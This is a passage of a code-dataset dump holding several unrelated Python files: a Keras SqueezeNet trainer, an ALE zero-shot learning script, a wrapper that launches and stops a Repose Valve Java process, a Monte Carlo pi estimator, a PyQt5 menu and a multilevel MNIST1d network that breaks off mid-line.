keras.layers.Activation(activation)(out)\n\n return out\n\n return convbn\n\ndef FireBlock(s1_filters, e1_filters, e3_filters):\n channel_axis = keras.backend.image_data_format()\n if channel_axis == 'channels_first':\n canary = 1\n else:\n canary = 3\n def fire(x):\n squeezed = ConvBNBlock(s1_filters, (1, 1))(x)\n\n expand_1 = ConvBNBlock(e1_filters, (1, 1))(squeezed)\n expand_3 = ConvBNBlock(e1_filters, (3, 3))(squeezed)\n\n out = keras.layers.Concatenate(axis=canary)([expand_1, expand_3])\n\n return out\n\n return fire\n\n\ndef uniform_label_smoothing(onehot_label, weight):\n smoothed = onehot_label\n n_classes = smoothed.shape[1]\n smoothed *= 1.0 - weight\n smoothed += 1.0 / n_classes * weight\n\n return smoothed\n\ndef multiple_outputs(generator):\n while True:\n gnext = generator.next()\n smoothed = uniform_label_smoothing(gnext[1], 0.1)\n yield gnext[0], [smoothed]\n#%%\n\ndef build_squeezenet():\n channel_axis = keras.backend.image_data_format()\n if channel_axis == 'channels_first':\n canary = 1\n else:\n canary = 3\n\n input = keras.layers.Input(shape=input_shape)\n\n conved = ConvBNBlock(96, (3, 3), strides=(2, 2))(input)\n conved = keras.layers.MaxPool2D((3, 3), strides=(2, 2))(conved)\n\n conved = FireBlock(16, 64, 64)(conved)\n conved = FireBlock(16, 64, 64)(conved)\n conved = keras.layers.MaxPool2D((3, 3), strides=(2, 2))(conved)\n\n conved = FireBlock(32, 128, 128)(conved)\n conved = FireBlock(32, 128, 128)(conved)\n conved = keras.layers.MaxPool2D((3, 3), strides=(2, 2))(conved)\n\n conved = FireBlock(48, 192, 192)(conved)\n conved = FireBlock(48, 192, 192)(conved)\n conved = FireBlock(64, 256, 256)(conved)\n conved = FireBlock(64, 256, 256)(conved)\n\n conved = keras.layers.Dropout(0.5)(conved)\n conved = ConvBNBlock(n_classes, (1, 1))(conved)\n avg = keras.layers.GlobalAveragePooling2D()(conved)\n scores = 
keras.layers.Activation('softmax')(avg)\n\n    model = keras.Model(inputs=input, outputs=[scores])\n\n    sgd = keras.optimizers.SGD(lr=0.04, momentum=0.9)\n    model.compile(loss='categorical_crossentropy',\n                  optimizer=sgd,\n                  metrics=['acc'])\n    return model\n\n\n# %%\nimport os\nsqnet_name = 'SqueezeNet'\nif os.path.isfile(sqnet_name + '.h5'):\n    squeezenet = keras.models.load_model(sqnet_name + '.h5')\nelse:\n    # build from scratch when no saved checkpoint exists yet\n    squeezenet = build_squeezenet()\n\n\nsqueezenet.summary()\n\nkeras.utils.plot_model(squeezenet, to_file=sqnet_name + '.png',\n                       show_shapes=True, show_layer_names=True)\n\n#%%\n\nchkpt = keras.callbacks.ModelCheckpoint(sqnet_name + '.h5', period=1, save_best_only=True)\nlrschedule = keras.callbacks.LearningRateScheduler(lambda epoch, lr: lr * 0.94 if (epoch+1) % 2 == 0 else lr, verbose=1)\n\ncallbacks = [chkpt, lrschedule]\nhist = squeezenet.fit_generator(multiple_outputs(train_gen), epochs=100, steps_per_epoch=len(train_gen),\nvalidation_data=multiple_outputs(val_gen), validation_steps=len(val_gen), callbacks=callbacks)\n\nimport pandas as pd\n\nhist_df = pd.DataFrame(hist.history)\nwith open(sqnet_name + '_hist.csv', mode='w') as f:\n    hist_df.to_csv(f)\n","sub_path":"ML/tf/tf/ConvNets/SqueezeNet1.1.py","file_name":"SqueezeNet1.1.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"200063506","text":"import numpy as np\nimport argparse\nfrom scipy import io, spatial\nimport time\nfrom random import shuffle\nimport random\nfrom sklearn import preprocessing\nfrom sklearn.metrics import confusion_matrix\n\nparser = argparse.ArgumentParser(description=\"GZSL with ALE\")\n\nparser.add_argument('-data', '--dataset', help='choose between APY, AWA2, AWA1, CUB, SUN', default='AWA2', type=str)\nparser.add_argument('-e', '--epochs', default=100, type=int)\nparser.add_argument('-es', '--early_stop', default=10, type=int)\nparser.add_argument('-norm', '--norm_type', help='std(standard), L2, None', default='std', type=str)\nparser.add_argument('-lr', '--lr', default=0.01, type=float)\nparser.add_argument('-mr', '--margin', default=1, type=float)\nparser.add_argument('-seed', '--rand_seed', default=42, type=int)\n\nclass ALE():\n\t\n\tdef __init__(self, args):\n\n\t\tself.args = args\n\n\t\trandom.seed(self.args.rand_seed)\n\t\tnp.random.seed(self.args.rand_seed)\n\n\t\tdata_folder = '../xlsa17/data/'+args.dataset+'/'\n\t\tres101 = io.loadmat(data_folder+'res101.mat')\n\t\tatt_splits=io.loadmat(data_folder+'att_splits.mat')\n\n\t\ttrain_loc = 'train_loc'\n\t\tval_loc = 'val_loc'\n\t\ttrainval_loc = 'trainval_loc'\n\t\ttest_seen_loc = 'test_seen_loc'\n\t\ttest_unseen_loc = 'test_unseen_loc'\n\n\t\tfeat = res101['features']\n\t\t# Shape -> (dxN)\n\t\tself.X_trainval_gzsl = feat[:, np.squeeze(att_splits[trainval_loc]-1)]\n\t\tself.X_test_seen = feat[:, np.squeeze(att_splits[test_seen_loc]-1)]\n\t\tself.X_test_unseen = feat[:, np.squeeze(att_splits[test_unseen_loc]-1)]\n\n\t\tlabels = res101['labels']\n\t\tself.labels_trainval_gzsl = np.squeeze(labels[np.squeeze(att_splits[trainval_loc]-1)])\n\t\tself.labels_test_seen = np.squeeze(labels[np.squeeze(att_splits[test_seen_loc]-1)])\n\t\tself.labels_test_unseen = np.squeeze(labels[np.squeeze(att_splits[test_unseen_loc]-1)])\n\t\tself.labels_test = np.concatenate((self.labels_test_seen, self.labels_test_unseen), axis=0)\n\n\t\ttrain_classes = np.unique(np.squeeze(labels[np.squeeze(att_splits[train_loc]-1)]))\n\t\tval_classes = 
np.unique(np.squeeze(labels[np.squeeze(att_splits[val_loc]-1)]))\n\t\ttrainval_classes_seen = np.unique(self.labels_trainval_gzsl)\n\t\tself.test_classes_seen = np.unique(self.labels_test_seen)\n\t\tself.test_classes_unseen = np.unique(self.labels_test_unseen)\n\t\ttest_classes = np.unique(self.labels_test) # All Classes of the dataset\n\n\t\ttrain_gzsl_indices=[]\n\t\tval_gzsl_indices=[]\n\n\t\tfor cl in train_classes:\n\t\t\ttrain_gzsl_indices = train_gzsl_indices + np.squeeze(np.where(self.labels_trainval_gzsl==cl)).tolist()\n\n\t\tfor cl in val_classes:\n\t\t\tval_gzsl_indices = val_gzsl_indices + np.squeeze(np.where(self.labels_trainval_gzsl==cl)).tolist()\n\n\t\ttrain_gzsl_indices = sorted(train_gzsl_indices)\n\t\tval_gzsl_indices = sorted(val_gzsl_indices)\n\t\t\n\t\tself.X_train_gzsl = self.X_trainval_gzsl[:, np.array(train_gzsl_indices)]\n\t\tself.labels_train_gzsl = self.labels_trainval_gzsl[np.array(train_gzsl_indices)]\n\t\t\n\t\tself.X_val_gzsl = self.X_trainval_gzsl[:, np.array(val_gzsl_indices)]\n\t\tself.labels_val_gzsl = self.labels_trainval_gzsl[np.array(val_gzsl_indices)]\n\n\t\tprint('Tr:{}; Val:{}; Tr+Val:{}; Test Seen:{}; Test Unseen:{}\\n'.format(self.X_train_gzsl.shape[1], self.X_val_gzsl.shape[1], \n\t\t\t self.X_trainval_gzsl.shape[1], self.X_test_seen.shape[1], \n\t\t\t self.X_test_unseen.shape[1]))\n\n\t\ti=0\n\t\tfor labels in trainval_classes_seen:\n\t\t\tself.labels_trainval_gzsl[self.labels_trainval_gzsl == labels] = i \n\t\t\ti+=1\n\n\t\tj=0\n\t\tfor labels in train_classes:\n\t\t\tself.labels_train_gzsl[self.labels_train_gzsl == labels] = j\n\t\t\tj+=1\n\n\t\tk=0\n\t\tfor labels in val_classes:\n\t\t\tself.labels_val_gzsl[self.labels_val_gzsl == labels] = k\n\t\t\tk+=1\n\n\t\tsig = att_splits['att']\n\t\t# Shape -> (Number of attributes, Number of Classes)\n\t\tself.trainval_sig = sig[:, trainval_classes_seen-1]\n\t\tself.train_sig = sig[:, train_classes-1]\n\t\tself.val_sig = sig[:, val_classes-1]\n\t\tself.test_sig = sig[:, test_classes-1] # Entire Signature Matrix\n\n\t\tif self.args.norm_type=='std':\n\t\t\tscaler_train = preprocessing.StandardScaler()\n\t\t\tscaler_trainval = preprocessing.StandardScaler()\n\t\t\t\n\t\t\tscaler_train.fit(self.X_train_gzsl.T)\n\t\t\tscaler_trainval.fit(self.X_trainval_gzsl.T)\n\n\t\t\tself.X_train_gzsl = scaler_train.transform(self.X_train_gzsl.T).T\n\t\t\tself.X_val_gzsl = scaler_train.transform(self.X_val_gzsl.T).T\n\t\t\t\n\t\t\tself.X_trainval_gzsl = scaler_trainval.transform(self.X_trainval_gzsl.T).T\n\t\t\tself.X_test_seen = scaler_trainval.transform(self.X_test_seen.T).T\n\t\t\tself.X_test_unseen = scaler_trainval.transform(self.X_test_unseen.T).T\n\n\t\tif self.args.norm_type=='L2':\n\t\t\tself.X_train_gzsl = self.normalizeFeature(self.X_train_gzsl.T).T\n\t\t\tself.X_trainval_gzsl = self.normalizeFeature(self.X_trainval_gzsl.T).T\n\t\t\t# self.X_val = self.normalizeFeature(self.X_val.T).T\n\t\t\t# self.X_test = self.normalizeFeature(self.X_test.T).T\n\n\tdef normalizeFeature(self, x):\n\t # x = N x d (d:feature dimension, N:number of instances)\n\t x = x + 1e-10\n\t feature_norm = np.sum(x**2, axis=1)**0.5 # l2-norm\n\t feat = x / feature_norm[:, np.newaxis]\n\n\t return feat\n\n\tdef update_W(self, X, labels, sig, W, idx, train_classes, beta):\n\t\t\n\t\tfor j in idx:\n\t\t\t\n\t\t\tX_n = X[:, j]\n\t\t\ty_n = labels[j]\n\t\t\ty_ = train_classes[train_classes!=y_n]\n\t\t\tXW = np.dot(X_n, W)\n\t\t\tgt_class_score = np.dot(XW, sig[:, y_n])\n\n\t\t\tfor i in range(len(y_)):\n\t\t\t\tlabel = 
random.choice(y_)\n\t\t\t\tscore = 1+np.dot(XW, sig[:, label])-gt_class_score # acc. to original paper, margin shd always be 1.\n\t\t\t\tif score>0:\n\t\t\t\t\tY = np.expand_dims(sig[:, y_n]-sig[:, label], axis=0)\n\t\t\t\t\tW += self.args.lr*beta[int(y_.shape[0]/(i+1))]*np.dot(np.expand_dims(X_n, axis=1), Y)\n\t\t\t\t\tbreak\n\n\t\treturn W\n\n\tdef fit_train(self):\n\n\t\tprint('Training on train set...\\n')\n\n\t\tbest_val_acc = 0.0\n\t\tbest_tr_acc = 0.0\n\t\tbest_val_ep = -1\n\t\tbest_tr_ep = -1\n\t\t\n\t\trand_idx = np.arange(self.X_train_gzsl.shape[1])\n\n\t\tW = np.random.rand(self.X_train_gzsl.shape[0], self.train_sig.shape[0])\n\t\tW = self.normalizeFeature(W.T).T\n\n\t\ttrain_classes = np.unique(self.labels_train_gzsl)\n\n\t\tbeta = np.zeros(len(train_classes))\n\t\tfor i in range(1, beta.shape[0]):\n\t\t\tsum_alpha=0.0\n\t\t\tfor j in range(1, i+1):\n\t\t\t\tsum_alpha+=1/j\n\t\t\tbeta[i] = sum_alpha\n\n\t\tfor ep in range(self.args.epochs):\n\n\t\t\tstart = time.time()\n\n\t\t\tshuffle(rand_idx)\n\n\t\t\tW = self.update_W(self.X_train_gzsl, self.labels_train_gzsl, self.train_sig, W, rand_idx, train_classes, beta)\n\t\t\t\n\t\t\tval_acc = self.zsl_acc(self.X_val_gzsl, W, self.labels_val_gzsl, self.val_sig)\n\t\t\ttr_acc = self.zsl_acc(self.X_train_gzsl, W, self.labels_train_gzsl, self.train_sig)\n\n\t\t\tend = time.time()\n\t\t\t\n\t\t\telapsed = end-start\n\t\t\t\n\t\t\tprint('Epoch:{}; Train Acc:{}; Val Acc:{}; Time taken:{:.0f}m {:.0f}s\\n'.format(ep+1, tr_acc, val_acc, elapsed//60, elapsed%60))\n\t\t\t\n\t\t\tif val_acc>best_val_acc:\n\t\t\t\tbest_val_acc = val_acc\n\t\t\t\tbest_val_ep = ep+1\n\t\t\t\n\t\t\tif tr_acc>best_tr_acc:\n\t\t\t\tbest_tr_ep = ep+1\n\t\t\t\tbest_tr_acc = tr_acc\n\n\t\t\tif ep+1-best_val_ep>self.args.early_stop:\n\t\t\t\tprint('Early Stopping by {} epochs. Exiting...'.format(self.args.epochs-(ep+1)))\n\t\t\t\tbreak\n\n\t\tprint('Best Val Acc:{} @ Epoch {}. 
Best Train Acc:{} @ Epoch {}\\n'.format(best_val_acc, best_val_ep, best_tr_acc, best_tr_ep))\n\t\t\n\t\treturn best_val_ep\n\n\tdef fit_trainval(self):\n\n\t\tprint('\\nTraining on trainval set for GZSL...\\n')\n\n\t\tbest_tr_acc = 0.0\n\t\tbest_tr_ep = -1\n\t\t\n\t\trand_idx = np.arange(self.X_trainval_gzsl.shape[1])\n\n\t\tW = np.random.rand(self.X_trainval_gzsl.shape[0], self.trainval_sig.shape[0])\n\t\tW = self.normalizeFeature(W.T).T\n\t\t# fall back to the initial W in case no epoch improves the accuracy\n\t\tbest_W = np.copy(W)\n\n\t\ttrainval_classes = np.unique(self.labels_trainval_gzsl)\n\n\t\tbeta = np.zeros(len(trainval_classes))\n\t\tfor i in range(1, beta.shape[0]):\n\t\t\tsum_alpha=0.0\n\t\t\tfor j in range(1, i+1):\n\t\t\t\tsum_alpha+=1/j\n\t\t\tbeta[i] = sum_alpha\n\n\t\tfor ep in range(self.num_epochs_trainval):\n\n\t\t\tstart = time.time()\n\n\t\t\tshuffle(rand_idx)\n\n\t\t\tW = self.update_W(self.X_trainval_gzsl, self.labels_trainval_gzsl, self.trainval_sig, W, rand_idx, trainval_classes, beta)\n\t\t\t\n\t\t\ttr_acc = self.zsl_acc(self.X_trainval_gzsl, W, self.labels_trainval_gzsl, self.trainval_sig)\n\n\t\t\tend = time.time()\n\t\t\t\n\t\t\telapsed = end-start\n\t\t\t\n\t\t\tprint('Epoch:{}; Trainval Acc:{}; Time taken:{:.0f}m {:.0f}s\\n'.format(ep+1, tr_acc, elapsed//60, elapsed%60))\n\t\t\t\t\t\t\n\t\t\tif tr_acc>best_tr_acc:\n\t\t\t\tbest_tr_ep = ep+1\n\t\t\t\tbest_tr_acc = tr_acc\n\t\t\t\tbest_W = np.copy(W)\n\n\t\tprint('Best Trainval Acc:{} @ Epoch {}\\n'.format(best_tr_acc, best_tr_ep))\n\t\t\n\t\treturn best_W\n\n\tdef zsl_acc(self, X, W, y_true, sig): # Class Averaged Top-1 Accuracy\n\n\t\tXW = np.dot(X.T, W)# N x k\n\t\tdist = 1-spatial.distance.cdist(XW, sig.T, 'cosine')# N x C(no. of classes)\n\t\tpredicted_classes = np.array([np.argmax(output) for output in dist])\n\t\tcm = confusion_matrix(y_true, predicted_classes)\n\t\tcm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n\t\tacc = sum(cm.diagonal())/sig.shape[1]\n\n\t\treturn acc\n\n\tdef zsl_acc_gzsl(self, X, W, y_true, classes, sig): # Class Averaged Top-1 Accuracy\n\n\t\tclass_scores = np.matmul(np.matmul(X.T, W), sig) # N x Number of Classes\n\t\ty_pred = np.array([np.argmax(output)+1 for output in class_scores])\n\n\t\tper_class_acc = np.zeros(len(classes))\n\n\t\tfor i in range(len(classes)):\n\t\t\tis_class = y_true==classes[i]\n\t\t\tper_class_acc[i] = ((y_pred[is_class]==y_true[is_class]).sum())/is_class.sum()\n\t\t\n\t\treturn per_class_acc.mean()\n\n\tdef evaluate(self):\n\n\t\tself.num_epochs_trainval = self.fit_train()\n\n\t\tbest_W = self.fit_trainval()\n\n\t\tprint('Testing...\\n')\n\n\t\tacc_seen_classes = self.zsl_acc_gzsl(self.X_test_seen, best_W, self.labels_test_seen, self.test_classes_seen, self.test_sig)\n\t\tacc_unseen_classes = self.zsl_acc_gzsl(self.X_test_unseen, best_W, self.labels_test_unseen, self.test_classes_unseen, self.test_sig)\n\t\tHM = 2*acc_seen_classes*acc_unseen_classes/(acc_seen_classes+acc_unseen_classes)\n\n\t\tprint('U:{}; S:{}; H:{}'.format(acc_unseen_classes, acc_seen_classes, HM))\n\nif __name__ == '__main__':\n\t\n\targs = parser.parse_args()\n\tprint('Dataset : {}\\n'.format(args.dataset))\n\t\n\tclf = ALE(args)\t\n\tclf.evaluate()\n","sub_path":"ALE/ale_gzsl.py","file_name":"ale_gzsl.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"285874253","text":"#!/usr/bin/env python\n\n# Copyright (C) 2012-2013 Richard Sartor \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the 
License.\n# You may obtain a copy of the License at\n#\n#    http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\nimport subprocess\nimport socket\nimport logging\nimport threading\nimport Queue\nimport time\nimport requests\n\n\nlogger = logging.getLogger(__name__)\n\n\n_default_jar_file = 'usr/share/repose/repose-valve.jar'\n\n\nclass ReposeValve:\n    def __init__(self, config_dir, port=None, https_port=None, jar_file=None,\n                 stop_port=None, insecure=False, wait_on_start=False):\n        logger.debug('Creating new ReposeValve object (config_dir=%s, '\n                     'jar_file=%s, stop_port=%s, insecure=%s)' %\n                     (config_dir, jar_file, stop_port, insecure))\n\n        if jar_file is None:\n            jar_file = _default_jar_file\n\n        if stop_port is None:\n            if port is None:\n                stop_port = 9090\n            else:\n                stop_port = port + 1000\n\n        if wait_on_start:\n            if port is not None:\n                wait_url = 'http://localhost:%s/' % str(port)\n            elif https_port is not None:\n                wait_url = 'https://localhost:%s' % str(https_port)\n            else:\n                raise ValueError(\"Either 'port' and/or 'https_port' must \"\n                                 \"specify a port number if 'wait_on_start' is \"\n                                 \"True\")\n\n        self.config_dir = config_dir\n        self.port = port\n        self.jar_file = jar_file\n        self.stop_port = stop_port\n        self.insecure = insecure\n\n        pargs = [\n            'java', '-jar', jar_file,\n            '-c', config_dir,\n            '-s', str(stop_port)\n        ]\n\n        if port is not None:\n            pargs.append('-p')\n            pargs.append(str(port))\n\n        if https_port is not None:\n            pargs.append('-ps')\n            pargs.append(str(https_port))\n\n        if insecure:\n            pargs.append('-k')\n\n        pargs.append('start')\n\n        logger.debug('Starting valve with the following command line: \"%s\"' %\n                     ' '.join(pargs))\n\n        self.proc = subprocess.Popen(pargs, stdout=subprocess.PIPE,\n                                     stderr=subprocess.PIPE)\n        self.stdout = ThreadedStreamReader(self.proc.stdout)\n        self.stderr = ThreadedStreamReader(self.proc.stderr)\n\n        if wait_on_start:\n            wait_count = 0\n            while True:\n                try:\n                    sc = requests.get(wait_url)\n                    # requests returns a Response object; check its status code\n                    if sc.status_code == 200:\n                        break\n                except:\n                    pass\n                time.sleep(1)\n                wait_count += 1\n                if wait_count > 30:\n                    break\n\n        logger.debug('New ReposeValve object initialized (pid=%i)' %\n                     self.proc.pid)\n\n    def stop(self, wait=True):\n        try:\n            logger.debug('Shutting down stdout and stderr readers.')\n            self.stdout.shutdown()\n            self.stderr.shutdown()\n\n            logger.debug('Attempting to stop ReposeValve object (pid=%i, '\n                         'stop_port=%s)' % (self.proc.pid, self.stop_port))\n            s = socket.create_connection(('localhost', self.stop_port))\n            s.send('stop\\r\\n')\n            if wait:\n                logger.debug('Waiting for process to end (pid=%i)' %\n                             self.proc.pid)\n                self.wait()\n        except:\n            logger.debug('Couldn\\'t stop using the stop port, killing instead '\n                         '(pid=%i)' % self.proc.pid)\n            self.proc.kill()\n        logger.debug('Repose stopped (pid=%i)' % self.proc.pid)\n\n    def wait(self):\n        return self.proc.communicate()\n\n\nclass ThreadedStreamReader:\n    def __init__(self, stream):\n        self.stream = stream\n        # create the queue and shutdown flag before starting the reader\n        # thread, so the thread never races against missing attributes\n        self.queue = Queue.Queue()\n        self._shutdown = False\n        self.thread = threading.Thread(target=self._thread_target)\n        self.thread.daemon = True\n        self.thread.start()\n\n    def _thread_target(self):\n        for line in self.stream.xreadlines():\n            if self._shutdown:\n                break\n            self.queue.put(line)\n\n    def readline(self, 
timeout=None):\n s = self.queue.get(timeout=timeout)\n self.queue.task_done()\n return s\n\n def readlines(self):\n lines = []\n while not self.queue.empty():\n lines.append(self.readline())\n return lines\n\n def shutdown(self):\n self._shutdown = True\n\n\ndef stream_printer(fin, fout):\n while True:\n for line in fin.readlines():\n fout.write(line)\n fout.flush()\n time.sleep(1)\n","sub_path":"repose.py","file_name":"repose.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"147475746","text":"#!/usr/bin/python3\nimport sys\nimport math\nimport random\n\nif (len(sys.argv)<2):\n sys.exit(\"Usage: pi.py [number of trials], e.g. pi.py 1000\")\n\ninside=0\ntrials=int(sys.argv[1])\n\nfor i in range(trials):\n x=random.random()\n y=random.random()\n if (x*x+y*y)<1.0:\n inside+=1\n\npi=4.0*float(inside)/float(trials)\nprint(\"pi estimate=%9.6f error=%9.6f\"%(pi, pi-math.pi))\n","sub_path":"pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524214379","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom SELECTSUBJECTC import Ui_SELECTSUBJECTC\r\nfrom SELECTSUBJECTT import Ui_SELECTSUBJECTT\r\nfrom CLOCK import DigitalClock\r\n\r\nclass Ui_FIRSTMENU(object):\r\n\r\n def openWindow(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = DigitalClock()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def openWindow1(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_SELECTSUBJECTC()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def openWindow2(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_SELECTSUBJECTT()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def openWindow3(self):\r\n self.window = QtWidgets.QMainWindow()\r\n self.ui = Ui_FIRSTMENU()\r\n self.ui.setupUi(self.window)\r\n FIRSTMENU.hide()\r\n self.window.show()\r\n\r\n def setupUi(self, FIRSTMENU):\r\n FIRSTMENU.setObjectName(\"FIRSTMENU\")\r\n FIRSTMENU.resize(200, 96)\r\n self.centralwidget = QtWidgets.QWidget(FIRSTMENU)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n self.btn_open = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open.setIcon(QtGui.QIcon('clock.png'))\r\n self.btn_open.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open.setGeometry(QtCore.QRect(10, 25, 40, 40))\r\n self.btn_open.setObjectName(\"btn_open\")\r\n self.btn_open.clicked.connect(self.openWindow)\r\n\r\n self.btn_open1 = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open1.setIcon(QtGui.QIcon('camera.png'))\r\n self.btn_open1.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open1.setGeometry(QtCore.QRect(55, 25, 40, 40))\r\n self.btn_open1.setObjectName(\"btn_open1\")\r\n self.btn_open1.clicked.connect(self.openWindow1)\r\n\r\n self.btn_open2 = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open2.setIcon(QtGui.QIcon('stopwatch.png'))\r\n self.btn_open2.setIconSize(QtCore.QSize(40, 40))\r\n self.btn_open2.setGeometry(QtCore.QRect(100, 25, 40, 40))\r\n self.btn_open2.setObjectName(\"btn_open2\")\r\n self.btn_open2.clicked.connect(self.openWindow2)\r\n\r\n self.btn_open3 = QtWidgets.QPushButton(self.centralwidget)\r\n self.btn_open3.setIcon(QtGui.QIcon('bluetooth.png'))\r\n self.btn_open3.setIconSize(QtCore.QSize(40, 40))\r\n 
self.btn_open3.setGeometry(QtCore.QRect(145, 25, 40, 40))\r\n self.btn_open3.setObjectName(\"btn_open3\")\r\n self.btn_open3.clicked.connect(self.openWindow3)\r\n\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(70, 40, 211, 41))\r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n self.label.setFont(font)\r\n self.label.setObjectName(\"label\")\r\n FIRSTMENU.setCentralWidget(self.centralwidget)\r\n self.statusbar = QtWidgets.QStatusBar(FIRSTMENU)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n FIRSTMENU.setStatusBar(self.statusbar)\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n FIRSTMENU = QtWidgets.QMainWindow()\r\n ui = Ui_FIRSTMENU()\r\n ui.setupUi(FIRSTMENU)\r\n FIRSTMENU.show()\r\n sys.exit(app.exec_())","sub_path":"TEST/FIRSTMENU.py","file_name":"FIRSTMENU.py","file_ext":"py","file_size_in_byte":3408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"54169747","text":"from __future__ import annotations\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn import Linear\nimport torch\nimport copy\n\nclass MNIST1dBlock(nn.Module):\n def __init__(self, scaling=1.0, width=10, use_bias = False):\n super(MNIST1dBlock, self).__init__()\n\n self.scaling = scaling\n self.linear = nn.Linear(width, width, bias = use_bias)\n nn.init.xavier_normal_(self.linear.weight)\n self.shortcut = nn.Sequential()\n\n def forward(self, x):\n out = self.linear(x)\n out = float(self.scaling) * F.relu(out)\n out += self.shortcut(x)\n return out\n\n### mnist net ###\nclass MLFlatNetMNIST1d(nn.Module):\n linear: Linear\n def __init__(self, BasicBlock, num_layers=2048, scaling=1, width=10, nclasses=10, use_bias=True):\n super(MLFlatNetMNIST1d, self).__init__()\n\n self.num_blocks = num_layers\n\n layers = []\n self.linear_in = nn.Linear(40, 10, bias=use_bias)\n for i in range(self.num_blocks): # num_layers is n^m, the +1 is for nice matching\n layers.append(MNIST1dBlock(scaling=scaling, width = width, use_bias = use_bias))\n\n self.blocks = nn.Sequential(*layers)\n self.linear_out = nn.Linear(width, nclasses, bias=use_bias)\n\n def forward(self, x):\n out = self.linear_in(x)\n out = self.blocks(out)\n out = F.relu(self.linear_out(out))\n return out\n\n def restrict_weights(self, net_H: MLFlatNetMNIST1d, scaling=1.0):\n with torch.no_grad():\n net_H.linear_in.weight.data.copy_(torch.nn.parameter.Parameter(self.linear_in.weight.data))\n net_H.linear_in.bias.data.copy_(torch.nn.parameter.Parameter(self.linear_in.bias.data))\n for id_H, block_H in enumerate(net_H.blocks):\n block_h = self.blocks[2 * id_H]\n block_H.linear.weight.data.copy_(scaling*torch.nn.parameter.Parameter(block_h.linear.weight.data))\n block_H.linear.bias.data.copy_(scaling*torch.nn.parameter.Parameter(block_h.linear.bias.data))\n net_H.linear_out.weight.data.copy_(torch.nn.parameter.Parameter(self.linear_out.weight.data))\n net_H.linear_out.bias.data.copy_(torch.nn.parameter.Parameter(self.linear_out.bias.data))\n\n def restrict_gradient(self, net_H: MLFlatNetMNIST1d, scaling=1.0):\n with torch.no_grad():\n # I_h^H * g_h\n I_g_h = []\n\n I_g_h.append(self.linear_in.weight.grad)\n I_g_h.append(self.linear_in.bias.grad)\n\n for id_H, block_H in enumerate(net_H.blocks):\n block_h1 = self.blocks[2 * id_H]\n I_g_h.append(nn.Parameter(scaling*block_h1.linear.weight.grad).clone().detach())\n I_g_h.append(nn.Parameter(scaling*block_h1.linear.bias.grad).clone().detach())\n\n 
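# the input and output linear layers are shared across levels, so their\n            # gradients are restricted without the per-block scaling\n            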
I_g_h.append(self.linear_out.weight.grad)\n I_g_h.append(self.linear_out.bias.grad)\n\n return I_g_h\n\n def form_v(self, net_H: MLFlatNetMNIST1d):\n # v = g_H(x_h)- I[g_h(x_h)], I_g_h = I[g_h(x_h)]\n # add 1st and last layer ?\n I_g_h = self.restrict_gradient(net_H)\n v = []\n last_idx = len(I_g_h) -1\n\n v.append(torch.add(net_H.linear_in.weight.grad, -1.0 * I_g_h[0]))\n v.append(torch.add(net_H.linear_in.bias.grad, -1.0 * I_g_h[1]))\n\n for id_H, block_H in enumerate(net_H.blocks):\n v.append(torch.add(block_H.linear.weight.grad, -1 * I_g_h[2 * (id_H + 1)]))\n v.append(torch.add(block_H.linear.bias.grad, -1 * I_g_h[2 * (id_H + 1) + 1]))\n\n v.append(torch.add(net_H.linear_out.weight.grad, -1 * I_g_h[last_idx - 1]))\n v.append(torch.add(net_H.linear_out.bias.grad, -1 * I_g_h[last_idx]))\n\n return v\n\n def prolong_step_to_gradient(self, prev_w_H, net_H: MLFlatNetMNIST1d):\n # I_H^h (x_H^2 - x_H^1)\n # note: we assemble e in the gradient of net_h\n last_idx =len(prev_w_H)-1\n sign = -1.0\n self.zero_grad() # set to zero, then we need to add only and we don't need grad(f(\\theta^2_h)) anymore\n\n self.linear_in.weight.grad.copy_(torch.add(sign * net_H.linear_in.weight.data, sign * -1 * prev_w_H[0].data))\n self.linear_in.bias.grad.copy_(torch.add(sign * net_H.linear_in.bias.data, sign * -1 * prev_w_H[1].data))\n\n for id_H, block_H in enumerate(net_H.blocks, 0):\n idx = 2*(id_H+1)\n\n block_h1 = self.blocks[2*id_H]\n block_h1.linear.weight.grad.add_(torch.add(sign * block_H.linear.weight.data, sign * -1.0 * prev_w_H[idx].data))\n block_h1.linear.bias.grad.add_(torch.add(sign * block_H.linear.bias.data, 